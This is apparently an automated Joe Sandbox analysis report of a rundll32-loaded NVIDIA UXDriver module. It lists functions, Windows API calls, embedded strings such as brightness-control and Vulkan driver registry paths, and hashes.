Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskExceptionThrow$Deallocatestd::_std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 2759354802-0
Opcode ID: 6d49e94807b1f179427749f465642f2da799c52822a2ea57ed54f5f7d9566d11
Instruction ID: 0d9706e69b0e9138d02db9ca7f076abee620c46f42c4621d36a88d897cad8c24
Opcode Fuzzy Hash: 6d49e94807b1f179427749f465642f2da799c52822a2ea57ed54f5f7d9566d11
Instruction Fuzzy Hash: A8C11762B286C942DF18CB25E864AAEA755FB98BC0F445132DE9D47BC9DE7CE105C700

Function 00007FFDFA8BBA28 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8B27FC: std::runtime_error::runtime_error.LIBCPMT ref: 00007FFDFA8B28D6
Part of subcall function 00007FFDFA8B27FC: throw_exception.LIBCPMT ref: 00007FFDFA8B28DF

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA8BBAA5

Part of subcall function 00007FFDFA8B09E0: __std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8B0A12

Part of subcall function 00007FFDFA8C2F58: enable_error_info.LIBCPMT ref: 00007FFDFA8C2F72
Part of subcall function 00007FFDFA8C2F58: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8C2F91

Part of subcall function 00007FFDFA8C0AAC: throw_exception.LIBCPMT ref: 00007FFDFA8C0AC7

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA8BBBC8

Strings

Cannot convert dates prior to Jan 1, 1970, xrefs: 00007FFDFA8BBA9A
could not convert calendar time to local time, xrefs: 00007FFDFA8BBBBD

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: std::invalid_argument::invalid_argumentthrow_exception$ExceptionThrow__std_exception_copyenable_error_infostd::runtime_error::runtime_error
String ID: Cannot convert dates prior to Jan 1, 1970$could not convert calendar time to local time
API String ID: 3961748639-1097574331
Opcode ID: 04861b4c69b6c7a141ae0b26592c8f8106bb269fb2dbc542c92ba1a5e59addfc
Instruction ID: cfd0cc7bc471a6f59869c7476d356d0586e7991605c52922a15a452b8b1faf2e
Opcode Fuzzy Hash: 04861b4c69b6c7a141ae0b26592c8f8106bb269fb2dbc542c92ba1a5e59addfc
Instruction Fuzzy Hash: F6611562F2466646EF189BA5D8659FC2362BB447C4F405037DE2D2BBDEDE7CE5028700

Function 00007FFDFA968990 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFDFA9689F1
IsDebuggerPresent.KERNEL32 ref: 00007FFDFA968A09
OutputDebugStringW.KERNEL32 ref: 00007FFDFA968A1A

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FFDFA968A13

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: 611536a1a0a5444bbb5d3a74b3bedf1facef6155a213c0476897455c6dfbf728
Instruction ID: aeb2de8df8df159c685abbcf8ec96847a13515bc302c77bae46ac5a4daffcdbd
Opcode Fuzzy Hash: 611536a1a0a5444bbb5d3a74b3bedf1facef6155a213c0476897455c6dfbf728
Instruction Fuzzy Hash: 49118F32B14B42A7E7089B22D66077932A4FF04305F944075CA6D82A95EF3CE4B8C710

Function 00007FFDFA8BB560 Relevance: 6.2, APIs: 4, Instructions: 233COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32 ref: 00007FFDFA8BDCEE
GetLastError.KERNEL32 ref: 00007FFDFA8BDCF8

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CriticalErrorInitializeLastSection
String ID:
API String ID: 3413597225-0
Opcode ID: 4db546f3b79c203cb01530d438a4291011299e12985f3e21473a40ed8998f796
Instruction ID: 46a0dfe25eab5c6ee622f8bc008b6b3c9230ed6b8333f3cedd10afb7cb89b3ad
Opcode Fuzzy Hash: 4db546f3b79c203cb01530d438a4291011299e12985f3e21473a40ed8998f796
Instruction Fuzzy Hash: A491AF66718B4292EB19CF25E8A0B6933A4BB54BD4F588176CE6E433D8DF7CE494C340

Function 00007FFDFA8A9AC0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32 ref: 00007FFDFA8A9AD5
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FFDFA8A9AEC

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: DescriptorSecurity$DaclInitialize
String ID:
API String ID: 625223987-0
Opcode ID: c0a8e56eca8e4e281327c7623743745a170f8c253331fa8f05733e7852c7cf4d
Instruction ID: 39c0a5dc77c8fda0c72c4bc8354d4876e8d715590fcdbc48f7e22ef60e5b0a71
Opcode Fuzzy Hash: c0a8e56eca8e4e281327c7623743745a170f8c253331fa8f05733e7852c7cf4d
Instruction Fuzzy Hash: 45F0FE66B181828AF7588B21E874F6936506F41784F9940B4C868475D8DF7DA08A8724

Function 00007FFDFA8AB1E4 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 202COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDFA8AB229
SetLastError.KERNEL32 ref: 00007FFDFA8AB4DC

Part of subcall function 00007FFDFA8AC740: VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AC784
Part of subcall function 00007FFDFA8AC740: VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA8AC7AE

GetModuleHandleW.KERNEL32 ref: 00007FFDFA8AB28F
GetModuleFileNameW.KERNEL32 ref: 00007FFDFA8AB2A8
GetFileAttributesW.KERNEL32 ref: 00007FFDFA8AB31E
LocalFree.KERNEL32 ref: 00007FFDFA8AB334
GetLastError.KERNEL32 ref: 00007FFDFA8AB380
GetLastError.KERNEL32 ref: 00007FFDFA8AB3B5
GetLastError.KERNEL32 ref: 00007FFDFA8AB429
GetLastError.KERNEL32 ref: 00007FFDFA8AB465
LocalFree.KERNEL32 ref: 00007FFDFA8AB4A7
LocalFree.KERNEL32 ref: 00007FFDFA8AB4B0
GetLastError.KERNEL32 ref: 00007FFDFA8AB4BF
SetLastError.KERNEL32 ref: 00007FFDFA8AB4CC

Strings

SOFTWARE\Khronos\Vulkan\Drivers, xrefs: 00007FFDFA8AB433
DriverSupportModules, xrefs: 00007FFDFA8AB485
.sys, xrefs: 00007FFDFA8AB395
UserModeDriverNameWow, xrefs: 00007FFDFA8AB3BF
UserModeDListDriverNameWow, xrefs: 00007FFDFA8AB3E9
DriverSupportModulesWow, xrefs: 00007FFDFA8AB46F
UserModeDListDriverName, xrefs: 00007FFDFA8AB410
OpenGLDriverNameWow, xrefs: 00007FFDFA8AB3D5
OpenGLDriverName, xrefs: 00007FFDFA8AB404
UserModeDriverName, xrefs: 00007FFDFA8AB3F8
.dll, xrefs: 00007FFDFA8AB36A
SOFTWARE\Khronos\OpenCL\Vendors, xrefs: 00007FFDFA8AB449

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ErrorLast$FreeLocal$FileModule$AttributesConditionHandleInfoMaskNameVerifyVersion
String ID: .dll$.sys$DriverSupportModules$DriverSupportModulesWow$OpenGLDriverName$OpenGLDriverNameWow$SOFTWARE\Khronos\OpenCL\Vendors$SOFTWARE\Khronos\Vulkan\Drivers$UserModeDListDriverName$UserModeDListDriverNameWow$UserModeDriverName$UserModeDriverNameWow
API String ID: 4251772004-68925701
Opcode ID: feb76bd60ed193e30c4671ca4d1fcdfd808e7bf18f0632891ca69896ed32468b
Instruction ID: 80a0d32a72ecca53bea6e5a32ac769a06e4322b96099c72776c1e2e2fbeabcfd
Opcode Fuzzy Hash: feb76bd60ed193e30c4671ca4d1fcdfd808e7bf18f0632891ca69896ed32468b
Instruction Fuzzy Hash: F0919222B19B4351EB58DB51E864AB963A4FF44780F9400B5DE6D8B7E9EF7CE844C310

Function 00007FFDFA8AB514 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 247librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB5C6
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB5F6
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB62F
LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB679
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB6AE
LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB6E3
LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB7D5

Part of subcall function 00007FFDFA8AC064: SetLastError.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC070
Part of subcall function 00007FFDFA8AC064: GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC07A
Part of subcall function 00007FFDFA8AC064: LocalAlloc.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC08C
Part of subcall function 00007FFDFA8AC064: GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC09F
Part of subcall function 00007FFDFA8AC064: LocalFree.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC0B0

Part of subcall function 00007FFDFA979BB8: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA979BD5

LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB8AC
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB8B5
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB8BE
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB8C7

Part of subcall function 00007FFDFA8AAB70: VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AABB0
Part of subcall function 00007FFDFA8AAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA8AABDE

Strings

\SystemRoot\system32\, xrefs: 00007FFDFA8AB859, 00007FFDFA8AB868
NVDA, xrefs: 00007FFDFA8AB78C
gdi32.dll, xrefs: 00007FFDFA8AB597
D3DKMTEnumAdapters3, xrefs: 00007FFDFA8AB625
D3DKMTQueryAdapterInfo, xrefs: 00007FFDFA8AB5EC
D3DKMTEnumAdapters2, xrefs: 00007FFDFA8AB5BC

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Local$Free$Alloc$AddressProc$DirectorySystem$ConditionErrorInfoLastMaskVerifyVersion_invalid_parameter_noinfo
String ID: D3DKMTEnumAdapters2$D3DKMTEnumAdapters3$D3DKMTQueryAdapterInfo$NVDA$\SystemRoot\system32\$gdi32.dll
API String ID: 3214156114-2155789793
Opcode ID: 22e39945014d94b2270b4a0f70d15bca20469d08c9405ea033ee936579d7970c
Instruction ID: 1ff6739b7d2069f6207ec77d43595f08418d49f709b1687253e25f47f34741b0
Opcode Fuzzy Hash: 22e39945014d94b2270b4a0f70d15bca20469d08c9405ea033ee936579d7970c
Instruction Fuzzy Hash: 27B14D36B19A4795FB58DB65E8649B833A0BF44B88B4400B5CD2E577D8EF7CE846C310

Function 00007FFDFA900FA4 Relevance: 24.9, APIs: 3, Strings: 11, Instructions: 406COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00007FFDFA9011CE

Part of subcall function 00007FFDFA8FABE8: _Init_thread_footer.LIBCMT ref: 00007FFDFA8FACAB

Strings

ACELOG: failed to exec query Select * from WmiMonitorBrightnessMethods, xrefs: 00007FFDFA901646
ACELOG: Current pwm brightness: , xrefs: 00007FFDFA9014CC
Nvidia::UXDriver::Core::WmiBrightnessControl::InitECBrightness, xrefs: 00007FFDFA901044, 00007FFDFA90117D, 00007FFDFA90161C
Interpolated dGPU brightness: , xrefs: 00007FFDFA9014FD
Current OS Brightness : , xrefs: 00007FFDFA901295
ACELOG: Failed to obtain the cycle length of PWM (%d)! Forcing 800 for now, xrefs: 00007FFDFA9013A5
CurrentBrightness, xrefs: 00007FFDFA9011FC
SELECT * FROM WmiMonitorBrightness, xrefs: 00007FFDFA9010C4
WQL, xrefs: 00007FFDFA9010DA
ACELOG: Failed to connect to WMI server, failed to init EC brightness, xrefs: 00007FFDFA90106E
WmiBrightnessControl.cpp, xrefs: 00007FFDFA901018, 00007FFDFA901176, 00007FFDFA9015F0

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: InitInit_thread_footerVariant
String ID: Interpolated dGPU brightness: $ACELOG: Current pwm brightness: $ACELOG: Failed to connect to WMI server, failed to init EC brightness$ACELOG: Failed to obtain the cycle length of PWM (%d)! Forcing 800 for now$ACELOG: failed to exec query Select * from WmiMonitorBrightnessMethods$Current OS Brightness : $CurrentBrightness$Nvidia::UXDriver::Core::WmiBrightnessControl::InitECBrightness$SELECT * FROM WmiMonitorBrightness$WQL$WmiBrightnessControl.cpp
API String ID: 3754537983-2271714606
Opcode ID: 628ef8c08381526d3b675341c41e32d6837972d95de2ef61624d152d86d8edaf
Instruction ID: 9672a1f7b4bf9c558e68bd0fdbbf63cb879c497240d4609b5f2dbb93474f6f77
Opcode Fuzzy Hash: 628ef8c08381526d3b675341c41e32d6837972d95de2ef61624d152d86d8edaf
Instruction Fuzzy Hash: FA125A36B18B9289EB14CB60E8906ED77B8FB44788F900176EA5D47BADDF38D144C740

Function 00007FFDFA8AB8FC Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?,?,?,?,?,00007FFDFA8AACFB), ref: 00007FFDFA8AB91C
SetLastError.KERNEL32(?,?,?,?,?,00007FFDFA8AACFB), ref: 00007FFDFA8ABAC1

Part of subcall function 00007FFDFA8AB1E4: SetLastError.KERNEL32 ref: 00007FFDFA8AB229
Part of subcall function 00007FFDFA8AB1E4: GetModuleHandleW.KERNEL32 ref: 00007FFDFA8AB28F
Part of subcall function 00007FFDFA8AB1E4: GetModuleFileNameW.KERNEL32 ref: 00007FFDFA8AB2A8
Part of subcall function 00007FFDFA8AB1E4: GetFileAttributesW.KERNEL32 ref: 00007FFDFA8AB31E
Part of subcall function 00007FFDFA8AB1E4: LocalFree.KERNEL32 ref: 00007FFDFA8AB334

LocalFree.KERNEL32(?,?,?,?,?,00007FFDFA8AACFB), ref: 00007FFDFA8AB9F3

Part of subcall function 00007FFDFA979BB8: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA979BD5

GetLastError.KERNEL32(?,?,?,?,?,00007FFDFA8AACFB), ref: 00007FFDFA8ABA01
GetFileAttributesW.KERNEL32(?,?,?,?,?,00007FFDFA8AACFB), ref: 00007FFDFA8ABA5C
GetLastError.KERNEL32(?,?,?,?,?,00007FFDFA8AACFB), ref: 00007FFDFA8ABA6B
SetLastError.KERNEL32(?,?,?,?,?,00007FFDFA8AACFB), ref: 00007FFDFA8ABA78
LocalFree.KERNEL32(?,?,?,?,?,00007FFDFA8AACFB), ref: 00007FFDFA8ABA81
LocalFree.KERNEL32(?,?,?,?,?,00007FFDFA8AACFB), ref: 00007FFDFA8ABA8C
LocalFree.KERNEL32(?,?,?,?,?,00007FFDFA8AACFB), ref: 00007FFDFA8ABA95
SetLastError.KERNEL32(?,?,?,?,?,00007FFDFA8AACFB), ref: 00007FFDFA8ABAB1

Part of subcall function 00007FFDFA8AC064: SetLastError.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC070
Part of subcall function 00007FFDFA8AC064: GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC07A
Part of subcall function 00007FFDFA8AC064: LocalAlloc.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC08C
Part of subcall function 00007FFDFA8AC064: GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC09F
Part of subcall function 00007FFDFA8AC064: LocalFree.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC0B0

GetLastError.KERNEL32(?,?,?,?,?,00007FFDFA8AACFB), ref: 00007FFDFA8ABAA4

Strings

\SystemRoot\system32\, xrefs: 00007FFDFA8AB97D
system32\, xrefs: 00007FFDFA8AB96C

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ErrorLast$Local$Free$File$AttributesDirectoryModuleSystem$AllocHandleName_invalid_parameter_noinfo
String ID: \SystemRoot\system32\$system32\
API String ID: 2409060974-552109975
Opcode ID: 545285607237cb391dbd0e330b5cb997ee9b3b978d4aee174bfda1b9bdb13648
Instruction ID: 4850cad1fcac83dddce91b72342432529eb4152d4d2572a0bf05297f974fccea
Opcode Fuzzy Hash: 545285607237cb391dbd0e330b5cb997ee9b3b978d4aee174bfda1b9bdb13648
Instruction Fuzzy Hash: 1C51B111F2964395FB5CABA2D4399796290AF44BC0F4840B5D97E4B7DDEEACFC418320

Function 00007FFDFA8DFEC0 Relevance: 23.2, APIs: 2, Strings: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

RegisterTraceGuidsW.ADVAPI32 ref: 00007FFDFA8DFF87

Part of subcall function 00007FFDFA907800: std::_Deallocate.LIBCONCRT ref: 00007FFDFA9078B1

SetEvent.KERNEL32 ref: 00007FFDFA8E0659

Part of subcall function 00007FFDFA8DC180: CoCreateInstance.OLE32 ref: 00007FFDFA8DC21C
Part of subcall function 00007FFDFA8DC180: StringFromGUID2.OLE32 ref: 00007FFDFA8DC2CB

Strings

Nvidia::UXDriver::Core::NvXDCorePlugin::OnInitialize, xrefs: 00007FFDFA8E0011, 00007FFDFA8E0020, 00007FFDFA8E0107, 00007FFDFA8E0116, 00007FFDFA8E0266, 00007FFDFA8E0275, 00007FFDFA8E039F, 00007FFDFA8E03AE, 00007FFDFA8E0598, 00007FFDFA8E05A7, 00007FFDFA8E06C9, 00007FFDFA8E06D8
NvXDCore.cpp, xrefs: 00007FFDFA8DFF9F, 00007FFDFA8E055F, 00007FFDFA8E056E
Received OnInitialize() from NvContainer, xrefs: 00007FFDFA8E0040
Invalid serviceName received from container. Aborting..., xrefs: 00007FFDFA8E06F6
NVSvc, xrefs: 00007FFDFA8E01CC
